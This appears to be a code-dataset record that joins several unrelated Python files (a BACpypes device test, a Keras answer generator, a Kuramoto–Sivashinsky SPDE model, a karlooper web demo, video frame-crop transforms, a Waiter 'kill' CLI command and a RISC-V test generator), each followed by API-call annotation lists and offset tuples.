test_av_task = TestAnalogValueTask(args.avtask)
test_av_task.install_task()
# analog value thread
if args.avthread:
test_av_thread = TestAnalogValueThread(args.avthread)
deferred(test_av_thread.start)
# binary value task
if args.bvtask:
test_bv_task = TestBinaryValueTask(args.bvtask)
test_bv_task.install_task()
# binary value thread
if args.bvthread:
test_bv_thread = TestBinaryValueThread(args.bvthread)
deferred(test_bv_thread.start)
_log.debug("running")
run(args.spin)
_log.debug("fini")
if __name__ == "__main__":
main()
| [
"bacpypes.local.device.LocalDeviceObject",
"threading.Thread.__init__",
"bacpypes.consolelogging.ConfigArgumentParser",
"bacpypes.core.deferred",
"time.sleep",
"bacpypes.core.enable_sleeping",
"bacpypes.object.BinaryValueObject",
"bacpypes.core.run",
"bacpypes.object.AnalogValueObject",
"bacpypes.task.RecurringTask.__init__"
]
| [((10421, 10462), 'bacpypes.consolelogging.ConfigArgumentParser', 'ConfigArgumentParser', ([], {'description': '__doc__'}), '(description=__doc__)\n', (10441, 10462), False, 'from bacpypes.consolelogging import ConfigArgumentParser\n'), ((11416, 11447), 'bacpypes.local.device.LocalDeviceObject', 'LocalDeviceObject', ([], {'ini': 'args.ini'}), '(ini=args.ini)\n', (11433, 11447), False, 'from bacpypes.local.device import LocalDeviceObject\n'), ((11672, 11809), 'bacpypes.object.AnalogValueObject', 'AnalogValueObject', ([], {'objectIdentifier': "('analogValue', 1)", 'objectName': '"""av"""', 'presentValue': '(0.0)', 'statusFlags': '[0, 0, 0, 0]', 'covIncrement': '(1.0)'}), "(objectIdentifier=('analogValue', 1), objectName='av',\n presentValue=0.0, statusFlags=[0, 0, 0, 0], covIncrement=1.0)\n", (11689, 11809), False, 'from bacpypes.object import AnalogValueObject, BinaryValueObject\n'), ((12083, 12209), 'bacpypes.object.BinaryValueObject', 'BinaryValueObject', ([], {'objectIdentifier': "('binaryValue', 1)", 'objectName': '"""bv"""', 'presentValue': '"""inactive"""', 'statusFlags': '[0, 0, 0, 0]'}), "(objectIdentifier=('binaryValue', 1), objectName='bv',\n presentValue='inactive', statusFlags=[0, 0, 0, 0])\n", (12100, 12209), False, 'from bacpypes.object import AnalogValueObject, BinaryValueObject\n'), ((13186, 13200), 'bacpypes.core.run', 'run', (['args.spin'], {}), '(args.spin)\n', (13189, 13200), False, 'from bacpypes.core import run, deferred, enable_sleeping\n'), ((6623, 6668), 'bacpypes.task.RecurringTask.__init__', 'RecurringTask.__init__', (['self', '(interval * 1000)'], {}), '(self, interval * 1000)\n', (6645, 6668), False, 'from bacpypes.task import RecurringTask\n'), ((7546, 7567), 'threading.Thread.__init__', 'Thread.__init__', (['self'], {}), '(self)\n', (7561, 7567), False, 'from threading import Thread\n'), ((8660, 8705), 'bacpypes.task.RecurringTask.__init__', 'RecurringTask.__init__', (['self', '(interval * 1000)'], {}), '(self, interval * 1000)\n', (8682, 8705), False, 'from bacpypes.task import RecurringTask\n'), ((9635, 9656), 'threading.Thread.__init__', 'Thread.__init__', (['self'], {}), '(self)\n', (9650, 9656), False, 'from threading import Thread\n'), ((12562, 12579), 'bacpypes.core.enable_sleeping', 'enable_sleeping', ([], {}), '()\n', (12577, 12579), False, 'from bacpypes.core import run, deferred, enable_sleeping\n'), ((12836, 12866), 'bacpypes.core.deferred', 'deferred', (['test_av_thread.start'], {}), '(test_av_thread.start)\n', (12844, 12866), False, 'from bacpypes.core import run, deferred, enable_sleeping\n'), ((13123, 13153), 'bacpypes.core.deferred', 'deferred', (['test_bv_thread.start'], {}), '(test_bv_thread.start)\n', (13131, 13153), False, 'from bacpypes.core import run, deferred, enable_sleeping\n'), ((8245, 8270), 'time.sleep', 'time.sleep', (['self.interval'], {}), '(self.interval)\n', (8255, 8270), False, 'import time\n'), ((10301, 10326), 'time.sleep', 'time.sleep', (['self.interval'], {}), '(self.interval)\n', (10311, 10326), False, 'import time\n')] |
#Answer Generation
import csv
import os
import numpy as np
from keras.models import *
from keras.models import Model
from keras.preprocessing import text
def load_model():
print('\nLoading model...')
# load json and create model
json_file = open('models/MODEL.json', 'r')
loaded_model_json = json_file.read()
json_file.close()
gate_model = model_from_json(loaded_model_json)
# load weights into new model
gate_model.load_weights('models/MODEL.h5', by_name=True)
return gate_model
train_ans, anslist = [], []
def ans_vec():
anslist = []
dataset = ['Train']
for data in dataset:
f = open('data/raw/' + data + '.csv')
lines = csv.reader(f)
for line in lines:
source_uri = line[4]
anslist.append(source_uri)
f.close()
return anslist
def generate_save_ans():
dic = 3
anslist = ans_vec()
gate_model = load_model()
test_title_feature = np.load('data/vectorized/Test_title.npy')
test_summary_feature = np.load('data/vectorized/Test_summary.npy')
tokenizer_a = text.Tokenizer(num_words=dic+1)
tokenizer_a.fit_on_texts(anslist)
dic_a = tokenizer_a.word_index
ind_a ={value:key for key, value in dic_a.items()}
num_test = len(open('data/raw/Test.csv', 'r').readlines())
ans = gate_model.predict([ test_title_feature, test_summary_feature])
fp = open('reports/Test.ans', 'w')
for h in range(num_test):
i = h
if np.argmax(ans[i][0],axis=0) == 0:
fp.write('indiatimes\n') #Low frequency words are replaced with "indiatimes"
else:
for j in range(dic):
an = np.argmax(ans[i][j],axis=0)
if j != dic-1:
anext = np.argmax(ans[i][j+1],axis=0)
if an != 0 and anext != 0: #Words before and after
if an == anext:
fp.write('') #Delete duplicate words
else:
fp.write(ind_a[an] + ' ')
elif an != 0 and anext == 0:
fp.write(ind_a[an])
elif an == 0 and anext != 0:
fp.write(ind_a[anext])
else:
fp.write('')
else:
if an != 0:
fp.write(ind_a[an] + '\n')
else:
fp.write('\n')
fp.close()
def main():
load_model()
print('\n\nGenerating answers...')
if os.path.exists('reports') == False:
os.mkdir('reports')
if os.path.isfile('reports/Test.ans') == False:
generate_save_ans()
print('\nAnswer generation complete...\n\n')
if __name__ == "__main__":
main() | [
"os.path.exists",
"keras.preprocessing.text.Tokenizer",
"numpy.argmax",
"os.path.isfile",
"os.mkdir",
"numpy.load",
"csv.reader"
]
| [((976, 1017), 'numpy.load', 'np.load', (['"""data/vectorized/Test_title.npy"""'], {}), "('data/vectorized/Test_title.npy')\n", (983, 1017), True, 'import numpy as np\n'), ((1045, 1088), 'numpy.load', 'np.load', (['"""data/vectorized/Test_summary.npy"""'], {}), "('data/vectorized/Test_summary.npy')\n", (1052, 1088), True, 'import numpy as np\n'), ((1108, 1141), 'keras.preprocessing.text.Tokenizer', 'text.Tokenizer', ([], {'num_words': '(dic + 1)'}), '(num_words=dic + 1)\n', (1122, 1141), False, 'from keras.preprocessing import text\n'), ((698, 711), 'csv.reader', 'csv.reader', (['f'], {}), '(f)\n', (708, 711), False, 'import csv\n'), ((2606, 2631), 'os.path.exists', 'os.path.exists', (['"""reports"""'], {}), "('reports')\n", (2620, 2631), False, 'import os\n'), ((2650, 2669), 'os.mkdir', 'os.mkdir', (['"""reports"""'], {}), "('reports')\n", (2658, 2669), False, 'import os\n'), ((2678, 2712), 'os.path.isfile', 'os.path.isfile', (['"""reports/Test.ans"""'], {}), "('reports/Test.ans')\n", (2692, 2712), False, 'import os\n'), ((1515, 1543), 'numpy.argmax', 'np.argmax', (['ans[i][0]'], {'axis': '(0)'}), '(ans[i][0], axis=0)\n', (1524, 1543), True, 'import numpy as np\n'), ((1707, 1735), 'numpy.argmax', 'np.argmax', (['ans[i][j]'], {'axis': '(0)'}), '(ans[i][j], axis=0)\n', (1716, 1735), True, 'import numpy as np\n'), ((1794, 1826), 'numpy.argmax', 'np.argmax', (['ans[i][j + 1]'], {'axis': '(0)'}), '(ans[i][j + 1], axis=0)\n', (1803, 1826), True, 'import numpy as np\n')] |
"""Non-linear SPDE model on a periodic 1D spatial domain for laminar wave fronts.
Based on the Kuramato--Sivashinsky PDE model [1, 2] which exhibits spatio-temporally
chaotic dynamics.
References:
1. Kuramoto and Tsuzuki. Persistent propagation of concentration waves
in dissipative media far from thermal equilibrium.
Progress in Theoretical Physcs, 55 (1976) pp. 356–369.
2. Sivashinsky. Nonlinear analysis of hydrodynamic instability in laminar
flames I. Derivation of basic equations.
Acta Astronomica, 4 (1977) pp. 1177–1206.
"""
from typing import Union, Optional, Sequence, Callable
import numpy as np
from dapy.models.base import AbstractDiagonalGaussianModel
from dapy.models.spatial import SpatiallyExtendedModelMixIn
from dapy.integrators.etdrk4 import FourierETDRK4Integrator
from dapy.models.transforms import (
OneDimensionalFourierTransformedDiagonalGaussianModelMixIn,
fft,
real_array_to_rfft_coeff,
rfft_coeff_to_real_array,
)
class FourierLaminarFlameModel(AbstractDiagonalGaussianModel):
"""Non-linear SPDE model on a periodic 1D spatial domain for laminar flame fronts.
This model class represents the state field by its the Fourier coefficients rather
than values of the state field at the spatial mesh points.
Based on the Kuramato--Sivashinsky PDE model [1, 2] which exhibits spatio-temporally
chaotic dynamics.
The governing stochastic partial differential equation (SPDE) is
dX = -(∂⁴X/∂s⁴ + ∂²X/∂s² + X * ∂X/∂s + γ * X) dt + κ ⊛ dW
where `s` is the spatial coordinate in a periodic domain `[0, S)`, `t` the time
coordinate, `X(s, t)` the state field process, `γ` a coefficient controlling the
degree of damping in the dynamics, `W(s, t)` a space-time white noise process,
`κ(s)` a spatial smoothing kernel and `⊛` indicates circular convolution in the
spatial coordinate.
Using a spectral spatial discretisation, this corresponds to a non-linear system of
stochastic differential equations (SDEs) in the Fourier coefficients X̃ₖ
dX̃ₖ = (ωₖ² - ωₖ⁴ - γ) * X̃ₖ + (i * ωₖ / 2) * DFTₖ(IDFT(X̃)²) + κ̃ₖ * dW̃ₖ
where `W̃ₖ` is a complex-valued Wiener process, `κ̃ₖ` the kth Fourier coefficient of
the smoothing kernel `κ`, `ωₖ = 2 * pi * k / S` the kth spatial frequency and `i`
the imaginary unit.
A Fourier-domain exponential time-differencing integrator with 4th order Runge--
Kutta updates for non-linear terms [3, 4] is used to integrate the deterministic
component of the SDE dynamics and an Euler-Maruyama discretisation used for the
Wiener process increment.
The smoothing kernel Fourier coefficients are assumed to be
κ̃ₖ = σ * exp(-ωₖ² * ℓ²) * √(M / S)
where `σ` is a parameter controlling the amplitude and `ℓ` a parameter controlling
the length scale.
References:
1. Kuramoto and Tsuzuki. Persistent propagation of concentration waves
in dissipative media far from thermal equilibrium.
Progress in Theoretical Physcs, 55 (1976) pp. 356–369.
2. Sivashinsky. Nonlinear analysis of hydrodynamic instability in laminar
flames I. Derivation of basic equations. Acta Astronomica, 4 (1977)
pp. 1177–1206.
3. Kassam, Aly-Khan and Trefethen, <NAME>.
Fourth-order time-stepping for stiff PDEs.
SIAM Journal on Scientific Computing 26.4 (2005): 1214-1233.
4. Cox, <NAME>. and Matthews, <NAME>.
Exponential time differencing for stiff systems.
Journal of Computational Physics 176.2 (2002): 430-455.
"""
def __init__(
self,
dim_state: int = 512,
observation_space_indices: Union[slice, Sequence[int]] = slice(4, None, 8),
observation_function: Optional[Callable[[np.ndarray, int], np.ndarray]] = None,
time_step: float = 0.25,
domain_extent: float = 32 * np.pi,
damping_coeff: float = 1.0 / 6,
observation_noise_std: float = 0.5,
initial_state_amplitude: float = 1.0,
state_noise_amplitude: float = 1.0,
state_noise_length_scale: float = 1.0,
num_roots_of_unity_etdrk4_integrator: int = 16,
**kwargs
):
"""
Args:
dim_state: Dimension of state which is equivalent here to number of mesh
points in spatial discretization.
observation_space_indices: Slice or sequence of integers specifying spatial
mesh node indices (indices in to state vector) corresponding to
observation points.
observation_function: Function to apply to subsampled state field to compute
mean of observation(s) given state(s) at a given time index. Defaults to
identity function in first argument.
time_step: Integrator time step.
domain_extent: Extent (size) of spatial domain.
damping_coeff: Coefficient (`γ` in description above) controlling degree of
damping in dynamics.
observation_noise_std: Standard deviation of additive Gaussian noise in
observations. Either a scalar or array of shape `(dim_observation,)`.
Noise in each dimension assumed to be independent i.e. a diagonal noise
covariance.
initial_state_amplitude: Amplitude scale parameter for initial random
state field. Larger values correspond to larger magnitude values for the
initial state.
state_noise_amplitude: Amplitude scale parameter for additive state noise
in model dynamics. Larger values correspond to larger magnitude
additive noise in the state field.
state_noise_length_scale: Length scale parameter for smoothed noise used to
generate initial state and additive state noise fields. Larger values
correspond to smoother fields.
num_roots_of_unity_etdrk4_integrator: Number of roots of unity to use in
approximating contour integrals in exponential time-differencing plus
fourth-order Runge Kutta integrator.
"""
assert dim_state % 2 == 0, "State dimension `dim_state` must be even"
self.time_step = time_step
self.observation_space_indices = observation_space_indices
self.observation_function = observation_function
spatial_freqs = np.arange(dim_state // 2 + 1) * 2 * np.pi / domain_extent
spatial_freqs_sq = spatial_freqs ** 2
spatial_freqs[dim_state // 2] = 0
state_noise_kernel = (
(time_step) ** 0.5
* state_noise_amplitude
* np.exp(-0.5 * spatial_freqs_sq * state_noise_length_scale ** 2)
* (dim_state / domain_extent) ** 0.5
)
state_noise_std = rfft_coeff_to_real_array(
state_noise_kernel + 1j * state_noise_kernel, False
)
initial_state_kernel = (
initial_state_amplitude
* np.exp(-0.5 * spatial_freqs_sq * state_noise_length_scale ** 2)
* (dim_state / domain_extent) ** 0.5
)
initial_state_std = rfft_coeff_to_real_array(
initial_state_kernel + 1j * initial_state_kernel, False
)
def linear_operator(freqs, freqs_sq):
return freqs_sq - freqs_sq ** 2 - damping_coeff
def nonlinear_operator(v, freqs, freqs_sq):
return (
-0.5j * freqs * fft.rfft(fft.irfft(v, norm="ortho") ** 2, norm="ortho")
)
self.integrator = FourierETDRK4Integrator(
linear_operator=linear_operator,
nonlinear_operator=nonlinear_operator,
num_mesh_point=dim_state,
domain_size=domain_extent,
time_step=time_step,
num_roots_of_unity=num_roots_of_unity_etdrk4_integrator,
)
if observation_function is None:
dim_observation = np.zeros(dim_state)[observation_space_indices].shape[0]
else:
dim_observation = observation_function(
np.zeros(dim_state)[observation_space_indices], 0
).shape[0]
super().__init__(
dim_state=dim_state,
dim_observation=dim_observation,
initial_state_std=initial_state_std,
initial_state_mean=np.zeros(dim_state),
state_noise_std=state_noise_std,
observation_noise_std=observation_noise_std,
**kwargs
)
def _next_state_mean(self, states: np.ndarray, t: int) -> np.ndarray:
return rfft_coeff_to_real_array(
self.integrator.step(real_array_to_rfft_coeff(states))
)
def _observation_mean(self, states: np.ndarray, t: int) -> np.ndarray:
subsampled_states = fft.irfft(real_array_to_rfft_coeff(states), norm="ortho")[
..., self.observation_space_indices
]
if self.observation_function is None:
return subsampled_states
else:
return self.observation_function(subsampled_states, t)
class SpatialLaminarFlameModel(
SpatiallyExtendedModelMixIn,
OneDimensionalFourierTransformedDiagonalGaussianModelMixIn,
FourierLaminarFlameModel,
):
"""Non-linear SPDE model on a periodic 1D spatial domain for laminar flame fronts.
This model class represents the state field by its values at the spatial mesh points
rather than the corresponding Fourier coefficients. For more details see the
docstring of `FourierLaminarFlameModel`.
"""
def __init__(
self,
dim_state: int = 512,
observation_space_indices: Union[slice, Sequence[int]] = slice(4, None, 8),
observation_function: Optional[Callable[[np.ndarray, int], np.ndarray]] = None,
time_step: float = 0.25,
domain_extent: float = 32 * np.pi,
damping_coeff: float = 1.0 / 6,
observation_noise_std: float = 0.5,
initial_state_amplitude: float = 1.0,
state_noise_amplitude: float = 1.0,
state_noise_length_scale: float = 1.0,
num_roots_of_unity_etdrk4_integrator: int = 16,
):
"""
Args:
dim_state: Dimension of state which is equivalent here to number of mesh
points in spatial discretization.
observation_space_indices: Slice or sequence of integers specifying spatial
mesh node indices (indices in to state vector) corresponding to
observation points.
observation_function: Function to apply to subsampled state field to compute
mean of observation(s) given state(s) at a given time index. Defaults to
identity function in first argument.
time_step: Integrator time step.
domain_extent: Extent (size) of spatial domain.
damping_coeff: Coefficient (`γ` in description above) controlling degree of
damping in dynamics.
observation_noise_std: Standard deviation of additive Gaussian noise in
observations. Either a scalar or array of shape `(dim_observation,)`.
Noise in each dimension assumed to be independent i.e. a diagonal noise
covariance.
initial_state_amplitude: Amplitude scale parameter for initial random
state field. Larger values correspond to larger magnitude values for the
initial state.
state_noise_amplitude: Amplitude scale parameter for additive state noise
in model dynamics. Larger values correspond to larger magnitude
additive noise in the state field.
state_noise_length_scale: Length scale parameter for smoothed noise used to
generate initial state and additive state noise fields. Larger values
correspond to smoother fields.
num_roots_of_unity_etdrk4_integrator: Number of roots of unity to use in
approximating contour integrals in exponential time-differencing plus
fourth-order Runge Kutta integrator.
"""
super().__init__(
dim_state=dim_state,
observation_space_indices=observation_space_indices,
observation_function=observation_function,
time_step=time_step,
domain_extent=domain_extent,
damping_coeff=damping_coeff,
observation_noise_std=observation_noise_std,
initial_state_amplitude=initial_state_amplitude,
state_noise_amplitude=state_noise_amplitude,
state_noise_length_scale=state_noise_length_scale,
num_roots_of_unity_etdrk4_integrator=num_roots_of_unity_etdrk4_integrator,
mesh_shape=(dim_state,),
domain_extents=(domain_extent,),
domain_is_periodic=True,
observation_node_indices=observation_space_indices,
)
| [
"dapy.models.transforms.fft.irfft",
"dapy.models.transforms.rfft_coeff_to_real_array",
"numpy.exp",
"dapy.integrators.etdrk4.FourierETDRK4Integrator",
"numpy.zeros",
"dapy.models.transforms.real_array_to_rfft_coeff",
"numpy.arange"
]
| [((6910, 6989), 'dapy.models.transforms.rfft_coeff_to_real_array', 'rfft_coeff_to_real_array', (['(state_noise_kernel + 1.0j * state_noise_kernel)', '(False)'], {}), '(state_noise_kernel + 1.0j * state_noise_kernel, False)\n', (6934, 6989), False, 'from dapy.models.transforms import OneDimensionalFourierTransformedDiagonalGaussianModelMixIn, fft, real_array_to_rfft_coeff, rfft_coeff_to_real_array\n'), ((7244, 7331), 'dapy.models.transforms.rfft_coeff_to_real_array', 'rfft_coeff_to_real_array', (['(initial_state_kernel + 1.0j * initial_state_kernel)', '(False)'], {}), '(initial_state_kernel + 1.0j * initial_state_kernel,\n False)\n', (7268, 7331), False, 'from dapy.models.transforms import OneDimensionalFourierTransformedDiagonalGaussianModelMixIn, fft, real_array_to_rfft_coeff, rfft_coeff_to_real_array\n'), ((7658, 7899), 'dapy.integrators.etdrk4.FourierETDRK4Integrator', 'FourierETDRK4Integrator', ([], {'linear_operator': 'linear_operator', 'nonlinear_operator': 'nonlinear_operator', 'num_mesh_point': 'dim_state', 'domain_size': 'domain_extent', 'time_step': 'time_step', 'num_roots_of_unity': 'num_roots_of_unity_etdrk4_integrator'}), '(linear_operator=linear_operator, nonlinear_operator\n =nonlinear_operator, num_mesh_point=dim_state, domain_size=\n domain_extent, time_step=time_step, num_roots_of_unity=\n num_roots_of_unity_etdrk4_integrator)\n', (7681, 7899), False, 'from dapy.integrators.etdrk4 import FourierETDRK4Integrator\n'), ((6761, 6824), 'numpy.exp', 'np.exp', (['(-0.5 * spatial_freqs_sq * state_noise_length_scale ** 2)'], {}), '(-0.5 * spatial_freqs_sq * state_noise_length_scale ** 2)\n', (6767, 6824), True, 'import numpy as np\n'), ((7093, 7156), 'numpy.exp', 'np.exp', (['(-0.5 * spatial_freqs_sq * state_noise_length_scale ** 2)'], {}), '(-0.5 * spatial_freqs_sq * state_noise_length_scale ** 2)\n', (7099, 7156), True, 'import numpy as np\n'), ((8434, 8453), 'numpy.zeros', 'np.zeros', (['dim_state'], {}), '(dim_state)\n', (8442, 8453), True, 'import numpy as np\n'), ((8737, 8769), 'dapy.models.transforms.real_array_to_rfft_coeff', 'real_array_to_rfft_coeff', (['states'], {}), '(states)\n', (8761, 8769), False, 'from dapy.models.transforms import OneDimensionalFourierTransformedDiagonalGaussianModelMixIn, fft, real_array_to_rfft_coeff, rfft_coeff_to_real_array\n'), ((8895, 8927), 'dapy.models.transforms.real_array_to_rfft_coeff', 'real_array_to_rfft_coeff', (['states'], {}), '(states)\n', (8919, 8927), False, 'from dapy.models.transforms import OneDimensionalFourierTransformedDiagonalGaussianModelMixIn, fft, real_array_to_rfft_coeff, rfft_coeff_to_real_array\n'), ((6503, 6532), 'numpy.arange', 'np.arange', (['(dim_state // 2 + 1)'], {}), '(dim_state // 2 + 1)\n', (6512, 6532), True, 'import numpy as np\n'), ((7570, 7596), 'dapy.models.transforms.fft.irfft', 'fft.irfft', (['v'], {'norm': '"""ortho"""'}), "(v, norm='ortho')\n", (7579, 7596), False, 'from dapy.models.transforms import OneDimensionalFourierTransformedDiagonalGaussianModelMixIn, fft, real_array_to_rfft_coeff, rfft_coeff_to_real_array\n'), ((8039, 8058), 'numpy.zeros', 'np.zeros', (['dim_state'], {}), '(dim_state)\n', (8047, 8058), True, 'import numpy as np\n'), ((8177, 8196), 'numpy.zeros', 'np.zeros', (['dim_state'], {}), '(dim_state)\n', (8185, 8196), True, 'import numpy as np\n')] |
# -*-encoding:utf-8-*-
import os
from karlooper.web.application import Application
from karlooper.web.request import Request
class UsersHandler(Request):
def get(self):
return self.render("/user-page.html")
class UserInfoHandler(Request):
def post(self):
print(self.get_http_request_message())
size = self.get_parameter("user_size", 0)
size = int(size)
user_list = [{"name": "name_%d" % i, "gender": "male", "age": i + 10} for i in range(size)]
result = {
"status": 0,
"message": "OK",
"data": user_list
}
return self.response_as_json(result)
url_mapping = {
"/users": UsersHandler,
"/user-info": UserInfoHandler
}
settings = {
"template": os.getcwd() + "/templates",
"static": os.getcwd() + "/templates",
"log_enable": False,
"debug": True
}
if __name__ == '__main__':
application = Application(url_mapping, settings=settings)
application.listen(port=8080)
application.run()
| [
"karlooper.web.application.Application",
"os.getcwd"
]
| [((930, 973), 'karlooper.web.application.Application', 'Application', (['url_mapping'], {'settings': 'settings'}), '(url_mapping, settings=settings)\n', (941, 973), False, 'from karlooper.web.application import Application\n'), ((768, 779), 'os.getcwd', 'os.getcwd', ([], {}), '()\n', (777, 779), False, 'import os\n'), ((810, 821), 'os.getcwd', 'os.getcwd', ([], {}), '()\n', (819, 821), False, 'import os\n')] |
import random
import math
class LoopPadding(object):
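    """Loop the given frame indices until the desired output size is reached.

    Args:
        size (int): Desired output size of the padded index list.
    """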
def __init__(self, size):
self.size = size
def __call__(self, frame_indices):
out = frame_indices
for index in out:
if len(out) >= self.size:
break
out.append(index)
return out
class TemporalBeginCrop(object):
"""Temporally crop the given frame indices at a beginning.
If the number of frames is less than the size,
loop the indices as many times as necessary to satisfy the size.
Args:
size (int): Desired output size of the crop.
"""
def __init__(self, size):
self.size = size
def __call__(self, frame_indices):
out = frame_indices[:self.size]
for index in out:
if len(out) >= self.size:
break
out.append(index)
return out
class TemporalCenterCrop(object):
"""Temporally crop the given frame indices at a center.
If the number of frames is less than the size,
loop the indices as many times as necessary to satisfy the size.
Args:
size (int): Desired output size of the crop.
"""
def __init__(self, size):
self.size = size
def __call__(self, frame_indices):
"""
Args:
frame_indices (list): frame indices to be cropped.
Returns:
list: Cropped frame indices.
"""
center_index = len(frame_indices) // 2
begin_index = max(0, center_index - (self.size // 2))
end_index = min(begin_index + self.size, len(frame_indices))
out = frame_indices[begin_index:end_index]
for index in out:
if len(out) >= self.size:
break
out.append(index)
return out
class TemporalRandomCrop(object):
"""Temporally crop the given frame indices at a random location.
If the number of frames is less than the size,
loop the indices as many times as necessary to satisfy the size.
Args:
size (int): Desired output size of the crop.
"""
def __init__(self, size):
self.size = size
def __call__(self, frame_indices):
"""
Args:
frame_indices (list): frame indices to be cropped.
Returns:
list: Cropped frame indices.
"""
rand_end = max(0, len(frame_indices) - self.size - 1)
begin_index = random.randint(0, rand_end)
end_index = min(begin_index + self.size, len(frame_indices))
out = frame_indices[begin_index:end_index]
for index in out:
if len(out) >= self.size:
break
out.append(index)
return out
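# Illustrative usage of the crop transforms above (not part of the original
# module; the 40-frame clip and output size of 16 are arbitrary examples):
#
#   indices = list(range(40))
#   TemporalBeginCrop(16)(indices)    # frames 0..15
#   TemporalCenterCrop(16)(indices)   # frames 12..27, centred in the clip
#   TemporalRandomCrop(16)(indices)   # 16 consecutive frames, random start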
class TemporalCenterCropFlexible(object):
def __init__(self, begin=15, step=3, end=108):
self.begin = begin
self.step = step
self.end = end
assert (end - begin) / step + 1 == 32
def __call__(self, frame_indices):
out = frame_indices[slice(self.begin, self.end+1, self.step)]
return out
class TemporalCenterRandomCrop(object):
"""Temporally crop the given frame indices at a random location.
If the number of frames is less than the size,
loop the indices as many times as necessary to satisfy the size.
Args:
size (int): Desired output size of the crop.
"""
def __init__(self, size):
self.size = size
def __call__(self, frame_indices):
"""
Args:
frame_indices (list): frame indices to be cropped.
Returns:
list: Cropped frame indices.
"""
        spacing = int((len(frame_indices) - self.size)/2)  # e.g. 120 frames, size 90 -> spacing = 30
        offset = random.randint(-1*int(spacing/2) + 1, int(spacing/2) - 1)  # e.g. spacing 30 -> offset in [-14, 14]
        begin_index = int(len(frame_indices)/2) - int(self.size/2) + offset  # e.g. 120 and 90: 60 - 45 + offset, i.e. [1, 29]
end_index = begin_index + self.size
out = frame_indices[begin_index:end_index]
for index in out:
if len(out) >= self.size:
break
out.append(index)
return out | [
"random.randint"
]
| [((2430, 2457), 'random.randint', 'random.randint', (['(0)', 'rand_end'], {}), '(0, rand_end)\n', (2444, 2457), False, 'import random\n')] |
from waiter.action import process_kill_request
from waiter.util import guard_no_cluster, check_positive
def kill(clusters, args, _, __):
"""Kills the service(s) using the given token name."""
guard_no_cluster(clusters)
token_name_or_service_id = args.get('token-or-service-id')
is_service_id = args.get('is-service-id', False)
force_flag = args.get('force', False)
timeout_secs = args['timeout']
success = process_kill_request(clusters, token_name_or_service_id, is_service_id, force_flag, timeout_secs)
return 0 if success else 1
def register(add_parser):
"""Adds this sub-command's parser and returns the action function"""
parser = add_parser('kill', help='kill services')
parser.add_argument('token-or-service-id')
parser.add_argument('--force', '-f', help='kill all services, never prompt', dest='force', action='store_true')
parser.add_argument('--service-id', '-s', help='kill by service id instead of token',
dest='is-service-id', action='store_true')
parser.add_argument('--timeout', '-t', help='timeout (in seconds) for kill to complete',
type=check_positive, default=30)
return kill
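# Illustrative command-line usage after registration (the executable name
# "waiter" is assumed here; it is not defined in this module):
#   waiter kill TOKEN_NAME --timeout 60
#   waiter kill SERVICE_ID --service-id --force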
| [
"waiter.action.process_kill_request",
"waiter.util.guard_no_cluster"
]
| [((202, 228), 'waiter.util.guard_no_cluster', 'guard_no_cluster', (['clusters'], {}), '(clusters)\n', (218, 228), False, 'from waiter.util import guard_no_cluster, check_positive\n'), ((436, 537), 'waiter.action.process_kill_request', 'process_kill_request', (['clusters', 'token_name_or_service_id', 'is_service_id', 'force_flag', 'timeout_secs'], {}), '(clusters, token_name_or_service_id, is_service_id,\n force_flag, timeout_secs)\n', (456, 537), False, 'from waiter.action import process_kill_request\n')] |
# See LICENSE.incore file for details
import os,re
import multiprocessing as mp
import time
import shutil
from riscv_ctg.log import logger
import riscv_ctg.utils as utils
import riscv_ctg.constants as const
from riscv_isac.cgf_normalize import expand_cgf
from riscv_ctg.generator import Generator
from math import *
from riscv_ctg.__init__ import __version__
def create_test(usage_str, node,label,base_isa,max_inst):
global op_template
    global randomize
global out_dir
global xlen
flen = 0
if 'opcode' not in node:
return
if 'ignore' in node:
logger.info("Ignoring :" + str(label))
if node['ignore']:
return
for opcode in node['opcode']:
op_node=None
if opcode not in op_template:
for op,foo in op_template.items():
if op!='metadata' and foo['std_op'] is not None and opcode==foo['std_op']:
op_node = foo
break
else:
op_node = op_template[opcode]
if op_node is None:
logger.warning("Skipping :" + str(opcode))
return
if xlen not in op_node['xlen']:
logger.warning("Skipping {0} since its not supported in current XLEN:".format(opcode))
return
if 'flen' in op_node:
if '.d' in opcode:
flen = 64
elif '.s' in opcode:
flen = 32
else:
flen = op_node['flen'][0]
#if flen not in op_node['flen']:
# return
fprefix = os.path.join(out_dir,str(label))
logger.info('Generating Test for :' + str(label) +"-" + opcode)
formattype = op_node['formattype']
gen = Generator(formattype,op_node,opcode,randomize,xlen,flen,base_isa)
op_comb = gen.opcomb(node)
val_comb = gen.valcomb(node)
instr_dict = gen.correct_val(gen.testreg(gen.swreg(gen.gen_inst(op_comb, val_comb, node))))
logger.info("Writing tests for :"+str(label))
my_dict = gen.reformat_instr(instr_dict)
gen.write_test(fprefix,node,label,my_dict, op_node, usage_str, max_inst)
def ctg(verbose, out, random ,xlen_arg, cgf_file,num_procs,base_isa, max_inst,list_duplicate):
global op_template
global randomize
global out_dir
global xlen
logger.level(verbose)
logger.info('****** RISC-V Compliance Test Generator {0} *******'.format(__version__ ))
logger.info('Copyright (c) 2020, InCore Semiconductors Pvt. Ltd.')
logger.info('All Rights Reserved.')
logger.info("Copying env folder to Output directory.")
env_dir = os.path.join(out,"env")
if not os.path.exists(env_dir):
shutil.copytree(const.env,env_dir)
xlen = int(xlen_arg)
out_dir = out
randomize = random
mytime = time.asctime(time.gmtime(time.time()) ) + ' GMT'
cgf_argument = ''
for cf in cgf_file:
cgf_argument += '// --cgf {} \\\n'.format(cf)
randomize_argument = ''
if random is True:
randomize_argument = ' \\\n// --randomize'
usage_str = const.usage.safe_substitute(base_isa=base_isa, \
cgf=cgf_argument, version = __version__, time=mytime, \
randomize=randomize_argument,xlen=str(xlen_arg))
op_template = utils.load_yaml(const.template_file)
cgf = expand_cgf(cgf_file,xlen,list_duplicate)
pool = mp.Pool(num_procs)
results = pool.starmap(create_test, [(usage_str, node,label,base_isa,max_inst) for label,node in cgf.items()])
pool.close()
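# Illustrative call (argument values below are placeholders, not taken from
# this file):
#   ctg(verbose='info', out='work', random=False, xlen_arg=32,
#       cgf_file=['rv32i.cgf'], num_procs=4, base_isa='rv32i',
#       max_inst=None, list_duplicate=False)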
| [
"riscv_isac.cgf_normalize.expand_cgf",
"os.path.exists",
"os.path.join",
"shutil.copytree",
"riscv_ctg.log.logger.level",
"riscv_ctg.utils.load_yaml",
"multiprocessing.Pool",
"time.time",
"riscv_ctg.generator.Generator",
"riscv_ctg.log.logger.info"
]
